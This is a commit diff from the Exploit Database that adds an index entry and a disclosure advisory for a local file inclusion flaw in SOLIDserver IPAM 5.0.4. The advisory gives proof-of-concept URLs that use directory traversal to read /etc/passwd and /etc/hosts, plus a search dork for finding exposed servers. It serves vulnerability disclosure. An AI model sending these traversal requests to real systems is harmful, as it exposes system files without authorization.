DB: 2016-02-21

Offensive Security · Offensive Security · commit 897e728c20f4 · 2016-02-21T05:02:13.000Z
1 new exploits
diff --git a/files.csv b/files.csv
@@ -35715,3 +35715,4 @@ id,file,description,date,author,platform,type,port
 39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver DoS Vulnerability",2016-02-19,"Fitzl Csaba",windows,dos,0
 39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
+39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0
diff --git a/platforms/linux/local/75.c b/platforms/linux/local/75.c
@@ -96,6 +96,6 @@ else
  rm -rf ${TMPDIR}/mansh
 fi
 exit
-
-
-// milw0rm.com [2003-08-06]
+
+
+// milw0rm.com [2003-08-06]
diff --git a/platforms/php/webapps/39478.txt b/platforms/php/webapps/39478.txt
@@ -0,0 +1,33 @@
+Title: SOLIDserver <=5.0.4 - Local File Inclusion Vunerability
+Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
+
+Product: SOLIDserver
+Tested Version: : 5.0.4 and 4.0.2
+Vendor: efficient IP http://www.efficientip.com
+Google Dork: SOLIDserver login
+Date: 17 Feb 2016
+
+CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+
+
+About Product : 
+---------------
+EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes.
+SOLIDserver™ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments. 
+
+Vulnerability Details:
+----------------------
+Based on a code review done on the product , this product doesn't have any observation on some parameters, that make the attacker able to read file contents.
+
+PoC 1:
+-----
+https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd
+or
+view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd
+
+PoC 2 : [login authentication required]
+------
+https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
+
+
+#EOF
